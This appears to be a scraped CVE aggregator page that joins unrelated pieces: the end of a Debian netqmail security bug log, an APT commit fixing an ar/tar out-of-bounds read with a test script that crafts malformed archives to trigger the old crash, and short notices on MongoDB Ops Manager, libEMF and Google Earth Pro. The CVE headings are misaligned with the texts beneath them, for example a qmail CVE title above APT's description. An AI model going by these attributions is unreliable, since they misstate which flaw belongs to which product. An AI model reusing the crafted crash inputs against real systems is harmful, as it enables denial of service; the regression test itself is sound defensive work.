9NOe0zwaZL9sP82GXmBTpJ1hCJSLfYAmkmb/tnCuCIJk/XTnujySbcBU4IK0A4HT
BnviUcgUw/K3CFmTcN3V1FX8DgCpkknuKA1QhtTdqR3oEDA7vyWfLfwr336H28RN
Hxx/jAvPrckSjWefd3XyGoyeo0/QZUHvidf6IbcqJeYe2md2935Nw/VuyznHoCkY
IV/dfs3Z3C2yn/GgcWqxgjiAmRJSyVgj4DKJolcL9RF9F++se2ED6+O2MVJAu3/D
RYUv5J7v4ilx95Ew/uZ4vDZbK8I/x0+guDcZcXofIDAsQqVm7n9YGY8ZC40yJyaP
4/nQFH8Y3EL5rZjMu5t5zFoHG5KYXkcfkLwBGTJf+5aiIT7AELEUhyDmL+j4etP4
OKmw1Ok1e3mqngDljIpFLi99hbnYN/GHpwMFAXnV9PUdo4bepF9FwtrZDBq7c4ne
GVwcHLOVE4hjqBcOf6AfjBtuZCbMkcoKoBkQL+LakFDmJELBuOOFHNIE/5tcEPTR
3xmVRV4mfUN7aHga0pyTK5dEqzAck6dqWAFeIIeqF8jdwu0hwfKs0JZRlxFUztL8
lNQc4a2fyqtJA4Mn9+tn6/VUDb2MDyxKxAulF2AdDX9r+VPTyj6vxY0/89oY6mi+
tYiRGEbZD4d0
=zJYo
-----END PGP SIGNATURE-----

**Reply sent** to Salvatore Bonaccorso <carnil@debian.org>:  
You have taken responsibility. (Sat, 30 May 2020 17:51:10 GMT) (full text, mbox, link).

**Notification sent** to Salvatore Bonaccorso <carnil@debian.org>:  
Bug acknowledged by developer. (Sat, 30 May 2020 17:51:10 GMT) (full text, mbox, link).

Message #43 received at 961060-close@bugs.debian.org (full text, mbox, reply):

Source: netqmail
Source-Version: 1.06-6.2~deb9u1
Done: Salvatore Bonaccorso <carnil@debian.org>

We believe that the bug you reported is fixed in the latest version of
netqmail, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 961060@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Salvatore Bonaccorso <carnil@debian.org> (supplier of updated netqmail package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Thu, 21 May 2020 14:06:19 +0200
Source: netqmail
Architecture: source
Version: 1.06-6.2~deb9u1
Distribution: stretch-security
Urgency: high
Maintainer: Gerrit Pape <pape@smarden.org>
Changed-By: Salvatore Bonaccorso <carnil@debian.org>
Closes: 672155 866038 961060
Changes:
 netqmail (1.06-6.2~deb9u1) stretch-security; urgency=high
 .
   \* Non-maintainer upload by the Security Team.
   \* Rebuild for stretch-security
 .
 netqmail (1.06-6.2) unstable; urgency=high
 .
   \* Address CVE-2005-1513, CVE-2005-1514, CVE-2005-1515, CVE-2020-3811 and
     CVE-2020-3812 (Closes: #961060)
 .
 netqmail (1.06-6.1) unstable; urgency=medium
 .
   \* Non-maintainer upload.
   \* \[fdc8794a\] Setup Gitlab continous integration
   \* \[73e52807\] Fix quotation in postinst (Closes: #866038)
   \* \[2fc47776\] Make package piupart-clean (Closes: #672155)
Checksums-Sha1: 
 a2637165d8e7eadf4c525eb0153c3abc31ad6e15 1895 netqmail\_1.06-6.2~deb9u1.dsc
 9ee9a603e2ad3d8e1d34b900e19b7a5d275f538b 260941 netqmail\_1.06.orig.tar.gz
 3e3086e0d3012b95431a96bc19a5411b8ad3f2e6 35126 netqmail\_1.06-6.2~deb9u1.diff.gz
Checksums-Sha256: 
 774836d82b32583d3bf829c9c12db14f291d9a1c13d57bdacc38bbe184ee7de5 1895 netqmail\_1.06-6.2~deb9u1.dsc
 8e7d98d15211fc9f9c28109e942e2268f42a6672d68df92a42f2afa90ff00532 260941 netqmail\_1.06.orig.tar.gz
 37831df91026d8f194c70ca2207d892d61d467f6b5e38507e506e196c7f24ade 35126 netqmail\_1.06-6.2~deb9u1.diff.gz
Files: 
 ee927db48ce7cf81a121e3955aab2f8f 1895 mail extra netqmail\_1.06-6.2~deb9u1.dsc
 c922f776140b2c83043a6195901c67d3 260941 mail extra netqmail\_1.06.orig.tar.gz
 3e1d515c383572022c645d85659a5eb5 35126 mail extra netqmail\_1.06-6.2~deb9u1.diff.gz

-----BEGIN PGP SIGNATURE-----

iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl7Gb5VfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89EOOAP/jypWC9W4nOWTbSTei7R08RInoHHMlYc
XxzKZk5IfSvOGm8u5PaLk4OgH/R7dvLgwaHg8NpfnazOUWfU2uBkY0A8kzctrCom
oSVQzg/i/HroG5+rAl8/cccOWyeml0GdYTpNCZpW8fE482xyNsJ3hu5acgfWAklJ
MKeb99qGNUKUAzCXH29jUvn8ygPfJiujxdgK6ffhW9DlHBGiaZjl2b88brU+dBxL
jiVbTCvHV1/bi4k5/FfVqu21m5mR5/eU6lZZg23WFBSN8Y+uDgn4Kh9KEJjlbzs/
lpDjG21PrZTVGxEehcl+DPXlQkdWSPrsFiPGF6b4V2yoU4flcJzwsm9TpQdVSrxm
0oNQS1c7ZnYq3pV6QdzrULT2OSPzhhkGCty4a0hjGaoqACVPnyQgeM3qwroj2xo9
lkAVhevqxcE6TUQ8rxvFibXyoImeDnLn3mxDWq9Sw2uB9cvvWqOCDYBOuqrOPfJq
xSG1SC6A+uoJ18Gp5sDpXnoE+/qBoD1M7FUhdM6Mv7r6H9WHDsz4c1/MzGydl3t7
mJucFSLeHYi2YJeGugxkN113NjS2LUsXAXiD+4M0qa+Nwms1QCJ2UCxYEuugkGeg
ZNwAbCViv+TkPO/bKzkMleSpDsOb7sZJi6Vl4z7CXh8a3rJ1J4OW6dWIBOlytFyi
cOicAFyO1HfV
=uoLR
-----END PGP SIGNATURE-----

**Bug archived.** Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 02 Aug 2020 07:29:14 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Thu Apr 28 19:36:30 2022; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2020-3812: #961060 - qmail-verify: CVE-2020-3811 CVE-2020-3812

Missing input validation in the ar/tar implementations of APT before version 2.1.2 could result in denial of service when processing specially crafted deb files.

**Commit dceb1e49** authored May 12, 2020 by ![Julian Andres Klode's avatar](https://seccdn.libravatar.org/avatar/c59a7d59fa6e0e2d722136f9b18b30cf?s=48&d=identicon&gravatarproxy=n "Julian Andres Klode")

Browse files

**SECURITY UPDATE: Fix out of bounds read in .ar and .tar implementation (CVE-2020-3810)**

When normalizing ar member names by removing trailing whitespace
and slashes, an out-out-bound read can be caused if the ar member
name consists only of such characters, because the code did not
stop at 0, but would wrap around and continue reading from the
stack, without any limit.

Add a check to abort if we reached the first character in the
name, effectively rejecting the use of names consisting just
of slashes and spaces.

Furthermore, certain error cases in arfile.cc and extracttar.cc have
included member names in the output that were not checked at all and
might hence not be nul terminated, leading to further out of bound reads.

Fixes Debian/apt#111
LP: #1878177

*   Changes 3

...

...

@@ -92,7 +92,7 @@ bool ARArchive::LoadHeaders()

StrToNum(Head.Size,Memb\->Size,sizeof(Head.Size)) \== false)

{

delete Memb;

return \_error\->Error(\_("Invalid archive member header %s"), Head.Name);

return \_error\->Error(\_("Invalid archive member header"));

}

// Check for an extra long name string

...

...

@@ -119,7 +119,14 @@ bool ARArchive::LoadHeaders()

else

{

unsigned int I \= sizeof(Head.Name) \- 1;

for (; Head.Name\[I\] \== ' ' || Head.Name\[I\] \== '/'; I\--);

for (; Head.Name\[I\] \== ' ' || Head.Name\[I\] \== '/'; I\--)

{

if (I \== 0)

{

delete Memb;

return \_error\->Error(\_("Invalid archive member header"));

}

}

Memb\->Name \= std::string(Head.Name,I+1);

}

...

...

...

...

@@ -254,7 +254,7 @@ bool ExtractTar::Go(pkgDirStream &Stream)

default:

BadRecord \= true;

\_error\->Warning(\_("Unknown TAR header type %u, member %s"),(unsigned)Tar\->LinkFlag,Tar\->Name);

\_error\->Warning(\_("Unknown TAR header type %u"), (unsigned)Tar\->LinkFlag);

break;

}

...

...

#!/bin/sh

set \-e

TESTDIR\="$(readlink \-f "$(dirname "$0")")"

. "$TESTDIR/framework"

setupenvironment

configarchitecture "amd64"

setupaptarchive

\# this used to crash, but it should treat it as an invalid member header

touch ' '

ar \-q test.deb ' '

testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb

rm test.deb

touch 'x'

ar \-q test.deb 'x'

testsuccessequal "E: This is not a valid DEB archive, missing 'debian-binary' member" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb

\# <name><size> \[ other fields\] - name is not nul terminated here, it ends in .

msgmsg "Unterminated ar member name"

printf '!<arch>\\0120123456789ABCDE.A123456789A.01234.01234.0123456.012345678.0.' \> test.deb

testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb

\# unused source code for generating $tar below

maketar() {

cat \> maketar.c << EOF

#include <stdio.h>

#include <string.h>

struct tar {

char Name\[100\];

char Mode\[8\];

char UserID\[8\];

char GroupID\[8\];

char Size\[12\];

char MTime\[12\];

char Checksum\[8\];

char LinkFlag;

char LinkName\[100\];

char MagicNumber\[8\];

char UserName\[32\];

char GroupName\[32\];

char Major\[8\];

char Minor\[8\];

};

int main(void)

{

union {

struct tar t;

char buf\[512\];

} t;

for (int i = 0; i < sizeof(t.buf); i++)

t.buf\[i\] = '7';

memcpy(t.t.Name, "unterminatedName", 16);

memcpy(t.t.UserName, "userName", 8);

memcpy(t.t.GroupName, "thisIsAGroupNamethisIsAGroupName", 32);

t.t.LinkFlag = 'X'; // I AM BROKEN

memcpy(t.t.Size, "000000000000", sizeof(t.t.Size));

memset(t.t.Checksum,' ',sizeof(t.t.Checksum));

unsigned long sum = 0;

for (int i = 0; i < sizeof(t.buf); i++)

sum += t.buf\[i\];

int written = sprintf(t.t.Checksum, "%lo", sum);

for (int i = written; i < sizeof(t.t.Checksum); i++)

t.t.Checksum\[i\] = ' ';

fwrite(t.buf, sizeof(t.buf), 1, stdout);

}

EOF

gcc maketar.c \-o maketar \-Wall

./maketar

}

#

tar\="unterminatedName77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777700000000000077777777777773544 X777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777userName777777777777777777777777thisIsAGroupNamethisIsAGroupName777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777"

printf '%s' "$tar" | gzip \> control.tar.gz

cp control.tar.gz data.tar.gz

touch debian-binary

rm test.deb

ar \-q test.deb debian-binary control.tar.gz data.tar.gz

testsuccessequal "W: Unknown TAR header type 88" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb

CVE-2020-3810: SECURITY UPDATE: Fix out of bounds read in .ar and .tar implementation (CVE-2020-3810) (dceb1e49) · Commits · APT Developers / apt

In affected Ops Manager versions there is an exposed http route was that may allow attackers to view a specific access log of a publicly exposed Ops Manager instance. This issue affects: MongoDB Inc. MongoDB Ops Manager 4.0 versions 4.0.9, 4.0.10 and MongoDB Ops Manager 4.1 version 4.1.5.



CVE-2019-2388: Ops Manager Server Changelog — MongoDB Ops Manager 6.0

libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 1 of 2).

This is a re-release of libEMF-1.0.12. The NEWS file is updated to include the CVEs resolved in this release:

CVE-2020-11863  
libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 1 of 2).  
VulnerabilityType : Denial of service  
Vendor of Product : https://packages.debian.org/source/sid/libemf  
Affected Product Code Base : libemf - <=1.0.11  
Attack Type : Local  
Impact: Denial of Service  
Has vendor confirmed or acknowledged the vulnerability? true

CVE-2020-11864  
libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows denial of service (issue 2 of 2).  
VulnerabilityType : Denial of service  
\[Vendor of Product\] : https://packages.debian.org/source/sid/libemf  
Affected Product Code Base : libemf - <=1.0.11  
Attack Type : Local  
Impact Denial of Service : true  
Has vendor confirmed or acknowledged the vulnerability? true

CVE-2020-11865  
libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows out-of-bounds memory access  
VulnerabilityType : Out of bounds memory access  
\[Vendor of Product\] : https://packages.debian.org/source/sid/libemf  
Affected Product Code Base : libemf - <=1.0.11  
Attack Type : Local  
Impact: Information Disclosure  
Has vendor confirmed or acknowledged the vulnerability ? true

CVE-2020-11866  
libEMF (aka ECMA-234 Metafile Library) through 1.0.11 allows a use-after-free  
VulnerabilityType: Use after free  
Vendor of Product: https://packages.debian.org/source/sid/libemf  
Affected Product Code Base : libemf - <=1.0.11  
Attack Type : Local  
Impact: Code execution  
Has vendor confirmed or acknowledged the vulnerability ? true

Original release note:  
Another decade, another release of libEMF. This time thanks go to Michael Shigorin for patches for the AARCH64 and E2K architectures. Also, many thanks to Chintan Shah at McAfee for pointing out several bugs in the code when handed malformed EMF files.

There are updates to the source to use a (slightly) more modern style of C++. You will need a C++11 compiler to build it now.

This is going to be the last release which supports the autotools build system. I've added preliminary CMake support. But the next go 'round will be all CMake. If you are responible for packaging libEMF for distribution, please send me any CMake settings you'd like to see in the CPack configuration.

CVE-2020-11863: ECMA-234 Metafile Library / News: Re-Release of libEMF-1.0.12

Untrusted Search Path vulnerability in the windows installer of Google Earth Pro versions prior to 7.3.3 allows an attacker to insert malicious local files to execute unauthenticated remote code on the targeted system.

Tag

#debian